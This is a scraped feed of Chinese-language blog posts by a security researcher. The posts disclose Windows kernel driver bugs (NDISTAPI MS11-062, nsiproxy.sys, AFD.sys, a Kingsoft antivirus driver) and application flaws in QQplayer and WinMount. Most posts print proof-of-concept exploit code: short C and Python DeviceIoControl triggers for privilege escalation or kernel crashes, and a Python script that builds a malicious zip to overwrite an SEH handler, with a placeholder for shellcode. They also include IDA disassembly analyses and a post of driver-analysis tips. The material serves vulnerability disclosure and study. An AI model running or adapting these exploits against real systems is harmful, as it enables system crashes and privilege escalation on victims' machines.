SoftRCE.net » dge

Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)

dge — Tue, 13 Sep 2011 06:10:07 +0000

#include “stdio.h”
#include “windows.h”

#define NTSTATUS int

int main(int argc, char* argv[])
{

PULONG pShellcode;
char InputBuffer[4]={0};
ULONG AllocationSize,dwReturnSize;
HANDLE dev_handle;

SC_HANDLE hscmHandle = NULL;
SC_HANDLE hscDriver = NULL;

PROCESS_INFORMATION pi;
STARTUPINFOA stStartup;

printf(“\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n”);

dev_handle = CreateFile(“\\\\.\\NDISTAPI” ,GENERIC_READ | GENERIC_WRITE ,0,NULL,CREATE_ALWAYS ,0,0);

DeviceIoControl( dev_handle, 0x8fff23d4, InputBuffer,4,(PVOID)0×80000000,0,&dwReturnSize, NULL);

return 1;
}

Comments

2011年09月13日, ayarei writes: 顶~
2011年09月13日, Frears writes: 必须顶。
2011年10月17日, 123 writes: 你好fsdfsdf
2012年01月3日, admin writes: 为什么就是看不懂
2012年02月3日, 校园自助打印复印 writes: 代码什么的最烦人了

Copyright © 2008
This feed is for personal, non-commercial use only.
The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:
8e761b2ea8edc3ca311452b020051837)

随机日志

2008年09月30日 -- [国庆礼]Exploiting Windows Device Drivers译文版
2011年03月21日 -- QQplayer Memory Corruption Vulnerability
2008年10月19日 -- Vista Bootmgr/Winload使用的大部分选项ID
2010年03月11日 -- Think Different
2009年05月16日 -- 静态分析驱动的一点技巧
2011年04月8日 -- Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability
2010年08月3日 -- SoftRCE官方T恤开始订购了~
2009年01月10日 -- 容易被忽略的IDA快捷键
2009年05月15日 -- ActiveX 控件组件的Fuzz和利用
2009年02月1日 -- SoftRCE的Mail Server开通了！

Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability

dge — Wed, 18 May 2011 07:40:11 +0000

#!/usr/bin/python
from ctypes import *

kernel32 = windll.kernel32
Psapi = windll.Psapi

if __name__ == ‘__main__’:
GENERIC_READ = 0×80000000
GENERIC_WRITE = 0×40000000
OPEN_EXISTING = 0×3
CREATE_ALWAYS = 0×2

SYM_NAME   = “\\\\.\\Nsi”
dwReturn      = c_ulong()
out_buff      = ”
in_buff       = (“\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00″
“\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00″
“\x38\xfa\x78\x00\x0c\x00\x00\x00″)

handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)

Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability

dge — Fri, 08 Apr 2011 03:04:58 +0000

////////////////////////////////////////////////////////////////////////////
//
// Title: Microsoft Windows xp AFD.sys Local Kernel DoS Exploit
//
/////////////////////////////////////////////////////////////////////////////

#include
#include

#pragma comment (lib, “ws2_32.lib”)

BYTE buf[]={
0xac,0xfd,0xd3,0×00,0×01,0×00,0×00,0×00,0×00,0×00,
0×00,0×00,0×20,0×00,0×00,0×00,0xe8,0xfd,0xd3,0×00,
0xb8,0xfd,0xd3,0×00,0xf8,0xfd,0xd3,0×00,0xc4,0xfd,
0xd3,0×00,0xcc,0xfd,0xd3,0×00};

int main( )
{
WSADATA ws;

SOCKET tcp_socket;
struct sockaddr_in peer;
ULONG dwReturnSize;

printf(“\n Microsoft Windows xp AFD.sys Local Kernel DoS Exploit \n\n”);
printf(“\t Create by Lufeng Li of Neusoft Corporation. \n\n”);

WSAStartup(0×0202,&ws);

peer.sin_family = AF_INET;
peer.sin_port = htons( 0x01bd );
peer.sin_addr.s_addr = inet_addr( “127.0.0.1″ );

tcp_socket = socket(AF_INET, SOCK_DGRAM, 0);//SOCK_DGRAM

if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
{
printf(“connect error\n”);
exit(0);
}

DeviceIoControl( (HANDLE)tcp_socket,0x000120cf, buf,0×24,buf,0×24,&dwReturnSize, NULL);

return TRUE;
}

Comments

2011年04月22日, gz1x writes: AFD里问题很多，不仅仅是Dos，可以本地提权。
2011年04月23日, dge writes: @gz1x, 搞afd搞了一段时间了，到现在为止只弄出来这个，还得努力啊。

QQplayer Memory Corruption Vulnerability

dge — Mon, 21 Mar 2011 02:58:19 +0000

影响版本：<= QQplayer 2.8

一个符号扩展的问题出现在MP4Splitter.dll中。

.text:10023EFF                 mov     eax, [esi]
.text:10023F01                 push    0
.text:10023F03                 push    20h
.text:10023F05                 lea     ecx, [esp+40h+buff]
.text:10023F09                 push    ecx
.text:10023F0A                 mov     edx, [eax+0Ch]
.text:10023F0D                 mov     ecx, esi
.text:10023F0F                 call    edx                  ;从文件获取数据。
.text:10023F11                 movsx   eax, [esp+38h+buff] ;符号扩展产生一个类似0xFFFFFFFX的值。
.text:10023F16                 cmp     eax, 20h
.text:10023F19                 jge     short loc_10023F2E   ;检查被绕过
.text:10023F1B                 mov     [esp+eax+38h+buf], 0 ;恶意数据被用于指针操作，导致栈中的指针数据被破坏。
.text:10023F20                 lea     eax, [esp+38h+buf]
.text:10023F24                 push    eax
.text:10023F25                 lea     ecx, [edi+5Ch]

POC:不放了。

This work is licensed under a Creative Commons Attribution 3.0 Unported.

金山毒霸2011内核溢出漏洞

dge — Mon, 13 Sep 2010 10:04:01 +0000

这个漏洞是我7月份报告给金山的，漏洞存在于kavfm.sys中，它没有正确处理用户提交的参数，因此导致了这个溢出漏洞。
在新版本中，这个驱动被去掉了。

影响版本：Kingsoft Antivirus <=v2010.04.26.648

漏洞分析:

.text:00012160
.text:00012160 sub_12160       proc near               ; CODE XREF: sub_129B0+2Fp
.text:00012160
.text:00012160 var_44          = byte ptr -44h
.text:00012160 var_4           = dword ptr -4
.text:00012160 arg_4           = dword ptr  0Ch
.text:00012160
.text:00012160                 push    ebp
.text:00012161                 mov     ebp, esp
.text:00012163                 mov     ecx, [ebp+arg_4]
.text:00012166                 mov     eax, [ecx+60h]
.text:00012169                 sub     esp, 44h
.text:0001216C                 push    ebx
.text:0001216D                 mov     ebx, [eax+IO_STACK_LOCATION.Parameters.DeviceIoControl.InputBufferLength]
.text:00012170                 mov     eax, [eax+IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
.text:00012173                 push    esi
.text:00012174                 add     eax, 7FFCFFFCh
.text:00012179                 xor     esi, esi
.text:0001217B                 cmp     eax, 28h        ; switch 41 cases
.text:0001217E                 push    edi
.text:0001217F                 mov     edi, [ecx+IRP.AssociatedIrp.SystemBuffer]
.text:00012182                 ja      loc_122E0       ; default
.text:00012182                                         ; jumptable 0001218F cases 1-3,5-7,9-11,13-15,17-19,21-23,25-27,29-31,33-35,37-39
.text:00012188                 movzx   eax, ds:byte_1231C[eax]
.text:0001218F                 jmp     ds:off_122EC[eax*4] ; switch jump
.text:00012196
.text:00012196 loc_12196:                              ; DATA XREF: .text:off_122ECo
.text:00012196                 push    ebx             ; 拷贝长度是InputBufferLength，是我们可控制的。
.text:00012197                 lea     ecx, [ebp+var_44];
.text:0001219A                 push    edi             ; 如果这个串大于72字节就可以覆盖到返回地址。
.text:0001219B                 push    ecx             ; char *
.text:0001219C                 call    strncpy
.text:000121A1                 add     esp, 0Ch
.text:000121A4                 lea     edx, [ebp+var_44]
.text:000121A7                 push    edx
.text:000121A8                 mov     [ebp+ebx+var_44], 0
.text:000121AD                 call    sub_15410
.text:000121B2                 pop     edi
.text:000121B3                 mov     esi, eax
.text:000121B5                 pop     esi
.text:000121B6                 pop     ebx
.text:000121B7                 mov     esp, ebp
.text:000121B9                 pop     ebp
.text:000121BA                 retn    8

poc:

#!/usr/bin/python

from ctypes import *

kernel32 = windll.kernel32
Psapi = windll.Psapi

if __name__ == ’__main__’:
GENERIC_READ = 0×80000000
GENERIC_WRITE = 0×40000000
OPEN_EXISTING = 0×3
CREATE_ALWAYS = 0×2

DEVICE_NAME   = ”\\\\.\\kavfm”
dwReturn      = c_ulong()
out_size      = 1024
in_size       = 1024
in_data       =”
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
in_data=1024*’\x80′
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0×80030004, in_data,500, 0, 0,byref(dwReturn), None)

EOF

Comments

2010年09月13日, mj0011 writes: 金山的内核溢出少说有几十个，懒得爆了
2010年09月14日, dge writes: @mj0011, 还是MJ境界高。
2010年12月27日, vmprotect writes: 金山毒霸免费了，这个溢出漏洞被人利用的话，影响范围就太大了。

This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 2.5 China Mainland.

随机日志

2010年04月21日 -- WinMount mou文件格式溢出漏洞分析
2009年05月30日 -- 基于NDIS Filter 抓包
2010年02月21日 -- Step deeply into NDIS6 LightWeight Filter, part 1
2010年03月11日 -- Think Different
2011年03月21日 -- QQplayer Memory Corruption Vulnerability
2008年11月16日 -- 今天又地震～～
2009年04月30日 -- 中国游戏中心游戏大厅ActiveX远程栈溢出漏洞
2009年05月1日 -- Symbian S60 3rd Reverse CrAcKiNg Tutorial
2008年10月9日 -- About the SMM rootkit
2009年05月1日 -- 暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞

WinMount mou文件格式溢出漏洞分析

dge — Wed, 21 Apr 2010 11:55:42 +0000

Author：dge

前段时间发现的一个WinMount的漏洞并报给了WinMount，WinMount更新了，所以发布出来。

影响产品:WinMount 3.3.0401

WinMount在处理其mou私有格式的时候存在超长文件名溢出漏洞，这个漏洞存在于7z.dll中，并且可以绕过GS,SAFESEH成功利用。

由于WinMount对mou格式的特殊处理机制导致这个漏洞并不需要通过欺骗点击的方式来触发，只要你在电脑里看到这个精心构造的恶意mou文件，就能触发这个漏洞。

分析：
.text:100B5460 vul_ proc near ; CODE XREF: sub_100B64B0+2EEp
.text:100B5460
.text:100B5460 var_214 = dword ptr -214h
.text:100B5460 var_210 = dword ptr -210h
.text:100B5460 buf_20c = byte ptr -20Ch
.text:100B5460 arg_0 = dword ptr 4
.text:100B5460 arg_4 = dword ptr 8
.text:100B5460 arg_8 = dword ptr 0Ch
.text:100B5460 arg_C = dword ptr 10h
.text:100B5460 arg_10 = dword ptr 14h
.text:100B5460 arg_14 = dword ptr 18h
.text:100B5460 arg_18 = dword ptr 1Ch
.text:100B5460
.text:100B5460 sub esp, 214h
.text:100B5466 mov eax, dword_10101D2C
.text:100B546B xor eax, esp
.text:100B546D mov dword ptr [esp+214h+buf_20c+208h], eax
.text:100B5474 mov ecx, [esp+214h+arg_18]
.text:100B547B mov edx, [esp+214h+arg_4]
.text:100B5482 mov eax, [esp+214h+arg_C]
.text:100B5489 push ebx
.text:100B548A push ebp
.text:100B548B mov ebp, [esp+21Ch+arg_0]
.text:100B5492 push esi
.text:100B5493 mov esi, [esp+220h+arg_8]
.text:100B549A push edi
.text:100B549B mov [esp+224h+var_214], ecx
.text:100B549F push edx
.text:100B54A0 lea ecx, [ebp+58h]
.text:100B54A3 mov [esp+228h+var_210], eax
.text:100B54A7 call sub_100B5260
.text:100B54AC mov edi, [eax]
.text:100B54AE mov byte ptr [esi+6Ch], 1
.text:100B54B2 mov eax, [edi+26h]
.text:100B54B5 mov [esi+20h], eax
.text:100B54B8 mov eax, [edi+2Ah]
.text:100B54BB xor ebx, ebx
.text:100B54BD cmp eax, ebx
.text:100B54BF jz short loc_100B54D0
.text:100B54C1 cmp eax, 0FFFFFFFFh
.text:100B54C4 jz short loc_100B54D0
.text:100B54C6 mov byte ptr [esi+6Bh], 1
.text:100B54CA mov ecx, [edi+2Ah]
.text:100B54CD mov [esi+24h], ecx
.text:100B54D0
.text:100B54D0 loc_100B54D0: ; CODE XREF: vul_vul+5Fj
.text:100B54D0 ; vul_vul+64j
.text:100B54D0 cmp [edi+0Eh], ebx
.text:100B54D3 ja short loc_100B54DA
.text:100B54D5 cmp [edi+0Ah], ebx
.text:100B54D8 jbe short loc_100B54DE
.text:100B54DA
.text:100B54DA loc_100B54DA: ; CODE XREF: vul_vul+73j
.text:100B54DA mov al, 1
.text:100B54DC jmp short loc_100B54E0
.text:100B54DE ; —————————————————————————
.text:100B54DE
.text:100B54DE loc_100B54DE: ; CODE XREF: vul_vul+78j
.text:100B54DE xor al, al
.text:100B54E0
.text:100B54E0 loc_100B54E0: ; CODE XREF: vul_vul+7Cj
.text:100B54E0 test byte ptr [esi+20h], 10h
.text:100B54E4 mov [esi+68h], al
.text:100B54E7 setnbe dl
.text:100B54EA mov [esi+69h], dl
.text:100B54ED mov [esi+6Ah], bl
.text:100B54F0 mov eax, [edi+1Ah]
.text:100B54F3 mov ecx, [edi+1Eh]
.text:100B54F6 mov edx, eax
.text:100B54F8 or edx, ecx
.text:100B54FA jz short loc_100B5512
.text:100B54FC add eax, [esp+224h+arg_10]
.text:100B5503 adc ecx, [esp+224h+arg_14]
.text:100B550A mov [esi+60h], eax
.text:100B550D mov [esi+64h], ecx
.text:100B5510 jmp short loc_100B5518
.text:100B5512 ; —————————————————————————
.text:100B5512
.text:100B5512 loc_100B5512: ; CODE XREF: vul_vul+9Aj
.text:100B5512 mov [esi+60h], ebx
.text:100B5515 mov [esi+64h], ebx
.text:100B5518
.text:100B5518 loc_100B5518: ; CODE XREF: vul_vul+B0j
.text:100B5518 push 206h ; size_t
.text:100B551D lea ecx, [esp+228h+buf_20c+2]
.text:100B5521 xor eax, eax
.text:100B5523 push ebx ; int
.text:100B5524 push ecx ; void *
.text:100B5525 mov word ptr [esp+230h+buf_20c], ax
.text:100B552A call _memset
.text:100B552F add esp, 0Ch
.text:100B5532 push edi ; int
.text:100B5533 lea edx, [esp+228h+buf_20c]
.text:100B5537 push edx ; dst_string
.text:100B5538 push ebp ; int
.text:100B5539 call sub_100B3F90 ;

跟进去

.text:100B3F90 ; int __stdcall sub_100B3F90(int, LPWSTR dst_string, int)
.text:100B3F90 sub_100B3F90 proc near ; CODE XREF: sub_100B3F90+25p
.text:100B3F90 ; vul_vul+D9p
.text:100B3F90
.text:100B3F90 arg_0 = dword ptr 4
.text:100B3F90 dst_string = dword ptr 8
.text:100B3F90 arg_8 = dword ptr 0Ch
.text:100B3F90
.text:100B3F90 push ebx
.text:100B3F91 mov ebx, [esp+4+arg_8]
.text:100B3F95 mov eax, [ebx+5Ch]
.text:100B3F98 push esi
.text:100B3F99 mov esi, [esp+8+dst_string]
.text:100B3F9D push edi
.text:100B3F9E mov edi, ds:lstrcatW
.text:100B3FA4 test eax, eax
.text:100B3FA6 jz short loc_100B3FC2
.text:100B3FA8 cmp dword ptr [eax+56h], 0FFFFFFFFh
.text:100B3FAC jz short loc_100B3FC2
.text:100B3FAE push eax ; int
.text:100B3FAF mov eax, [esp+10h+arg_0]
.text:100B3FB3 push esi ; dst_string
.text:100B3FB4 push eax ; int
.text:100B3FB5 call sub_100B3F90
.text:100B3FBA push offset String2 ; “\\”
.text:100B3FBF push esi ; lpString1
.text:100B3FC0 call edi ; lstrcatW
.text:100B3FC2
.text:100B3FC2 loc_100B3FC2: ; CODE XREF: sub_100B3F90+16j
.text:100B3FC2 ; sub_100B3F90+1Cj
.text:100B3FC2 mov ecx, [ebx+52h]
.text:100B3FC5 push ecx ; lpString2
.text:100B3FC6 push esi ; lpString1
.text:100B3FC7 call edi ; lstrcatW ; 溢出
.text:100B3FC9 pop edi
.text:100B3FCA pop esi
.text:100B3FCB pop ebx
.text:100B3FCC retn 0Ch
.text:100B3FCC sub_100B3F90 endp

接下来会继续调用下边这个函数

.text:100209C0 access_ proc near ; CODE XREF: sub_10020AE0+6Cp
.text:100209C0 ; sub_10021060+105p …
.text:100209C0
.text:100209C0 p_string = dword ptr 4
.text:100209C0
.text:100209C0 push ebx
.text:100209C1 mov ebx, ecx
.text:100209C3 mov eax, [ebx]
.text:100209C5 push esi
.text:100209C6 xor ecx, ecx
.text:100209C8 push edi
.text:100209C9 mov edi, [esp+0Ch+p_string]
.text:100209CD mov dword ptr [ebx+4], 0
.text:100209D4 mov [eax], cx
.text:100209D7 xor esi, esi
.text:100209D9 cmp [edi], cx
.text:100209DC jz short loc_100209E7
.text:100209DE mov edi, edi
.text:100209E0
.text:100209E0 loc_100209E0: ; CODE XREF: access_+25j
.text:100209E0 inc esi
.text:100209E1 cmp [edi+esi*2], cx ; 可以制造出内存读异常—>绕过GS
.text:100209E5 jnz short loc_100209E0
.text:100209E7
.text:100209E7 loc_100209E7: ; CODE XREF: access_+1Cj
.text:100209E7 push esi
.text:100209E8 mov ecx, ebx
.text:100209EA call sub_10002F90
.text:100209EF mov ecx, [ebx]
.text:100209F1 mov edx, edi
.text:100209F3
.text:100209F3 loc_100209F3: ; CODE XREF: access_+42j
.text:100209F3 movzx eax, word ptr [edx]
.text:100209F6 mov [ecx], ax
.text:100209F9 add ecx, 2
.text:100209FC add edx, 2
.text:100209FF test ax, ax
.text:10020A02 jnz short loc_100209F3
.text:10020A04 pop edi
.text:10020A05 mov [ebx+4], esi
.text:10020A08 pop esi
.text:10020A09 mov eax, ebx
.text:10020A0B pop ebx
.text:10020A0C retn 4
.text:10020A0C access_ endp

POC:

用这个脚本产生test.zip，再借助WinMount生成test.mou文件。

import os

sploitfile=”test.zip”
ldf_header =(‘\x50\x4B\x03\x04\x14\x00\x00′
‘\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00′
‘\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00′
‘\xd0\xff’
‘\x00\x00\x00′)
cdf_header = (“\x50\x4B\x01\x02\x14\x00\x14″
“\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\xd0\xff”
“\x00\x00\x00\x00\x00\x00\x01\x00″
“\x24\x00\x00\x00\x00\x00\x00\x00″)
eofcdf_header = (“\x50\x4B\x05\x06\x00\x00\x00″
“\x00\x01\x00\x01\x00″
“\xfe\xff\x00\x00″
“\xee\xff\x00\x00″
“\x00\x00″)
print ”[+] Preparing payload\n”
size=65484
junk=’A'*420
nseh=’\x89\x8a\x8b\x8c’
seh=’\x84\x5b\xac\x8d’
junk_=’A'*33
jumpto=’\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4′#make eax point to shellcode and jump to shellcode
shellcode=(“the shellcode here will be changed into unicode”)#encode by alpha2
junk__=’B'*80
last=’C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+”.wav”
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print ”[+] Removing old zip file\n”
os.system(“del ”+sploitfile)
print ”[+] Writing payload to file\n”
fobj=open(sploitfile,”w”,0)
fobj.write(evilzip)
print ”generate zip file ”+(sploitfile)
fobj.close()
print ’[+] Wrote %d bytes to file sploitfile\n’%(len(evilzip))
print ”[+] Payload length :%d \n”%(len(payload))

EOF

Comments

2010年05月1日, Cyg07 writes: nx~顶了

This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported.

静态分析驱动的一点技巧

dge — Sat, 16 May 2009 09:12:36 +0000

author:dge

习惯了OD和IDA的组合，也懒的装内核调试器了，好在需要分析驱动的时候特别少，而且只用IDA就可以玩的转。

最近在整驱动的过程中积累了点技巧，把他们记录下来，以慰同菜。

Q:许多软件隐藏了驱动,如何找到它们?
A:其实很简单，隐藏文件肯定是驱动干的，不让驱动的加载，再牛B的隐藏也废了，用SSM拦截驱动的加载是个不错的选择。

Q:如何提高驱动代码可读性?
A:驱动中对IRP，DEVICE_OBJECT，DRIVER_OBJECT和IO_STACK_LOCATION的操作很多，所以把这些结构添加进来，然后把对这些结构的操作进行标识。

Q:如何完成驱动代码的准确定位?
A:一般的驱动都是用DeviceIoControl给驱动发送IRP_MJ_DEVICE_CONTROL类型的IRP来调用驱动中的代码，在驱动中一般先对
IRP_MJ_DEVICE_CONTROL进行处理，然后再细化到处理相应IOCTL的代码，这个IOCTL又是DeviceIoControl的一个参数，所以通过监视DeviceIoControl就可以完成代码的精确定位。

Q:如何来获取这个IOCTL?
A:(1):可以通过调试器对DeviceIoControl下断，不过一般得应付很多反调试，感觉很笨拙。
(2):可以写个监视DeviceIoControl的程序，然后把IOCTL作为日志实时的输出。如果我们想分析软件的某个功能，只要运行软件的某个功能,然后

在日志中找到IOCTL，再在驱动代码中搜索它，就可以完成准确定位了，这个方式感觉比较好，它饶过了反调试。

Q:如何实现监视?
A:其实就是改变DeviceIoControl的流程，inline hook就可以。

Q:还需要什么?
A:一点兴趣，一些体力。

Comments

2009年05月26日, mj0011 writes: 真技巧啊真技巧
2009年06月1日, lammer writes: Q:还需要什么? A:一点兴趣，一些体力。这个是最重要的·！赞

随机日志

2010年02月21日 -- Step deeply into NDIS6 LightWeight Filter, part 1
2009年02月1日 -- SoftRCE的Mail Server开通了！
2009年05月5日 -- [玩笑]某人不是会坐在被告席上吧？
2009年05月1日 -- Symbian S60 3rd Reverse CrAcKiNg Tutorial
2009年12月27日 -- Symbian_S60_3rd_Application_Cracking_With_IDA_Remote_Debugger_Tutorial
2010年01月12日 -- MS07-014调试手记
2010年02月10日 -- How to adjust the Ace of device object
2010年03月1日 -- Steve Jobs在斯坦福大学毕业典礼上的演讲
2009年04月30日 -- 中国游戏中心游戏大厅ActiveX远程栈溢出漏洞
2011年03月21日 -- QQplayer Memory Corruption Vulnerability

SoftRCE.net » dge

Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)

Comments

Related posts:

随机日志

Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability

Related posts:

相关阅读

Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability

Comments

Related posts:

相关阅读

QQplayer Memory Corruption Vulnerability

Related posts:

相关阅读

金山毒霸2011内核溢出漏洞

Comments

随机日志

WinMount mou文件格式溢出漏洞分析

Comments

相关阅读

静态分析驱动的一点技巧

Comments

随机日志